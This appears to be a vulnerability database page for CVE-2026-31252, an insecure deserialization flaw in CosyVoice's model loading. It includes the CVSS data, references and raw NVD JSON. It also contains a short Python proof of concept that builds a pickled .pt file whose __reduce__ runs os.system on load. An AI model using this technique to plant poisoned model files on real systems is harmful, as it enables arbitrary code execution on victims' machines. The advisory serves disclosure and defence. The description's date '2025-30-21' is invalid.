CVE-2026-31252

Description

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading component. The framework uses torch.load() to load model weight files (e.g., llm.pt, flow.pt, hift.pt) without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a malicious model directory containing specially crafted model files. When a victim starts the CosyVoice Web UI pointing to this directory, arbitrary code is executed on the victim's system during the model loading process.

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

CosyVoice <= commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import torch
import os

class MaliciousPayload:
    def __reduce__(self):
        # Execute arbitrary command upon deserialization
        return (os.system, ('calc.exe',))

# Create a malicious model file
malicious_data = MaliciousPayload()

# Save using torch.save (which uses pickle by default)
# Victims will load this thinking it is a valid model weight (e.g., llm.pt)
torch.save(malicious_data, 'malicious_llm.pt')

print("Malicious model file 'malicious_llm.pt' generated successfully.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31252
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31252
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31252/
[4] VulDB https://vuldb.com/cve/CVE-2026-31252
[5] https://github.com/FunAudioLLM/CosyVoice
[6] https://www.notion.so/CVE-2026-31252-35d1e139318881ef8acfcd877a432569

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31252", "sourceIdentifier": "[email protected]", "published": "2026-05-11T17:16:20.187", "lastModified": "2026-05-12T20:16:33.910", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading component. The framework uses torch.load() to load model weight files (e.g., llm.pt, flow.pt, hift.pt) without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a malicious model directory containing specially crafted model files. When a victim starts the CosyVoice Web UI pointing to this directory, arbitrary code is executed on the victim's system during the model loading process."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.5, "impactScore": 3.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-915"}]}], "references": [{"url": "https://github.com/FunAudioLLM/CosyVoice", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31252-35d1e139318881ef8acfcd877a432569", "source": "[email protected]"}]}}